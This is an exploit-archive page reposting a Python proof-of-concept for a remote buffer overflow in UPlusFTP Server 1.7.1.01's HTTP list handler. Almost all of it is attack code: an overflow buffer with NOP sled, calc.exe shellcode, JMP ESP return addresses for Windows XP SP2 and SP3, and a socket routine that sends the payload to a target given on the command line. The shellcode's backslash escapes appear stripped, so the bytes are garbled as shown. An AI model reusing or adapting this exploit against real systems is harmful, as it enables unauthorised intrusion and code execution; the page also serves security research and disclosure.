Security home

 
Home / exploitsPDF Print version

uplusftp-overflow.txt

Posted on 28 July 2010

#!/usr/bin/python
import socket,sys,base64

print """
#
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
UPlusFTP Server v1.7.1.01 [ HTTP ] Remote BoF Exploit PoC
Discovered by : Karn Ganeshen
Author : Karn Ganeshen / corelanc0d3r

KarnGaneshen [aT] gmail [d0t] com
http://ipositivesecurity.blogspot.com

Greetz out to:  corelanc0d3r
http://corelan.be:8800/index.php
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#
"""

# Tested on XP Pro SP2 [ Eng ] and XP Pro SP3 [ Eng ]
# Date Found : July 21, 2010
# Vendor notified on July 23, 2010
# Issue fixed and new version 1.7.1.02 released on July 23, 2010

if len(sys.argv) != 5:
print "Usage: ./poc.py <Target IP> <Port> <User> <Password>"
sys.exit(1)

target = sys.argv[1]
port = int(sys.argv[2])
user = sys.argv[3]
pwd = sys.argv[4]

auth = base64.b64encode(user+":"+pwd)

buf="A"*1963
buf+="x90"*179

# 165 bytes Calc.exe shellcode / badchars identified and excluded
buf+=("xd9xcax29xc9xb1x24xbfx3fxc7x66x9fxd9x74x24xf4x5e"
"x31x7ex17x03x7ex17x83xf9xc3x84x6axf9x24x0cx95x01"
"xb5x06xd0x3dx3ex64xdex45x41x7ax6bxfax59x0fx33x24"
"x5bxe4x85xafx6fx71x14x41xbex45x8ex31x45x85xc5x4e"
"x87xccx2bx51xc5x3axc7x6ax9dx98x2cxf9xf8x6ax73x25"
"x02x86xeaxaex08x13x78xefx0cxa2x95x84x31x2fx68x71"
"xc0x73x4fx81x10xbax4fxedx1dxfdx7fx68xe1x86x73xf9"
"xa2x7ax07x8dx3ex2ex9cx05x37xdbxaax5exc7xabxadx60"
"xc8x40xc5x5cx97x67xe0xfcx71x01xf4x7fxbdx6ax55x17"
"xcex07x51xb8x46x80xa4xccx99xe7xa7x37xc6x66x34xd4"
"x27x0cxbcx7fx38")

buf+="x90"*15

#[ XP SP2 ] -> "x78x16xF3x77"    #0x77F31678  JMP ESP
buf+="x78x16xF3x77"

#[ XP SP3 ] -> "x3Fx71x49x7E"   #0x7E49713F  JMP ESP
#buf+="x3Fx71x49x7E"

buf+="x90"*30
buf+="x66x05x7Ax03"         #ADD AX,037A
buf+="x66x05x7Ax03"         #ADD AX,037A
buf+="x66x05x7Ax03"         #ADD AX,037A
buf+="x50xc3"                 #PUSH EAX + RET

print "[+] Launching exploit against " + target + "..."

head = "GET /list.html?path="+buf+" HTTP/1.1 
"
head += "Host: 
"
head += "Authorization: Basic "+auth+"
"

try:
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((target, port))
s.send(head + "
")
print "[!] Payload sent..."
s.close()
except:
print "[x] Error!"

 

TOP

Malware :

Exploits :